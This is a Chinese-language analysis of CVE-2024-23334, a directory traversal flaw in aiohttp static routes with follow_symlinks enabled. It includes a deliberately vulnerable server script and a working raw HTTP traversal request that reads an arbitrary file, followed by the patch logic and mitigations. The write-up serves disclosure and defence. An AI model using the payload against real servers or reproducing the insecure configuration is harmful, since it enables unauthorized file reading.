CVE-2024-23334 AIOHTTP 目录遍历漏洞分析

漏洞描述：

aiohttp 是一个用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。使用aiohttp作为Web服务器并配置静态路由时，需要指定静态文件的根路径。此外，选项“follow_symlinks”可用于确定是否遵循静态根目录之外的符号链接。当“follow_symlinks”设置为 True 时，不会进行验证来检查读取的文件是否位于根目录内。这可能会导致目录遍历漏洞，从而导致对系统上的任意文件进行未经授权的访问，即使符号链接不存在也是如此。鼓励缓解措施是禁用 follow_symlinks 并使用反向代理。版本 3.9.2 修复了此问题。

服务启动Py文件中有"/static", "static/" 其中一个是涉及现有目录，没有自行创建一个，不然可能会报错

from aiohttp import webasync def index(request):    return web.Response(text="Hello, World!")app = web.Application()app.router.add_routes([    web.static("/static", "static/", follow_symlinks=True),])app.router.add_get('/', index)if __name__ == '__main__':    web.run_app(app, host='127.0.0.1', port=9999)

GET /static/../../../../D:\6666.txt HTTP/1.1Host: 127.0.0.1:9999User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1

漏洞原因：在使用 aiohttp 作为 Web 服务器时，错误配置静态资源解析可能导致目录遍历漏洞，允许攻击者未经授权读取系统上的任意文件。该漏洞的根本问题在于静态路由配置中的 follow_symlinks 选项，当设置为 True 时，可能绕过验证，使得符号链接可以指向根目录之外的文件，导致安全漏洞。

app.router.add_routes([    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability])

新版本补丁：

• 路径处理逻辑：使用 normalized_path对未解析的路径进行规范化处理，消除冗余的分隔符和相对路径。然后再尝试将规范化的路径转换为相对于指定目录的相对路径，最后解析为绝对路径。

• 符号链接处理：根据 follow_symlinks
  的设置，决定是否遵循符号链接。如果需要遵循，则使用规范化的路径，否则直接使用未解析的路径。

• 异常处理：在捕获到可能的异常时，如 ValueError 或 FileNotFoundError，同样触发了适当的错误处理，即抛出 HTTPForbidden 异常。

解决方法：

1. 禁用 `follow_symlinks` 选项： 即使升级到 aiohttp 的修补版本，建议立即在使用中禁用 `follow_symlinks` 选项。该选项不仅不需要跟随符号链接，而且在接受远程用户请求的服务器上使用时，可能导致配置错误风险。在配置静态路由时，确保不使用或将 `follow_symlinks` 设置为 `False`，以避免潜在的目录遍历漏洞。

app.router.add_routes([    web.static("/static", "static/", follow_symlinks=False),])

2. 使用反向代理服务器：aiohttp 建议将处理静态资源的责任交给反向代理服务器，例如 nginx。不要在 aiohttp 中将静态资源用于生产环境。通过使用反向代理，可以增加额外的安全层，防止此类漏洞的利用。

3. 及时更新配置和依赖项：定期审查和更新服务器配置，确保按最佳实践配置和使用 aiohttp。同时，保持依赖项的最新版本，以获取最新的安全修复和功能改进。

参考：

• https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f
• https://www.suse.com/security/cve/CVE-2024-23334.html
• https://vuldb.com/zh/?product.aio-libs:aiohttp
• https://github.com/aio-libs/aiohttp/pull/8079/files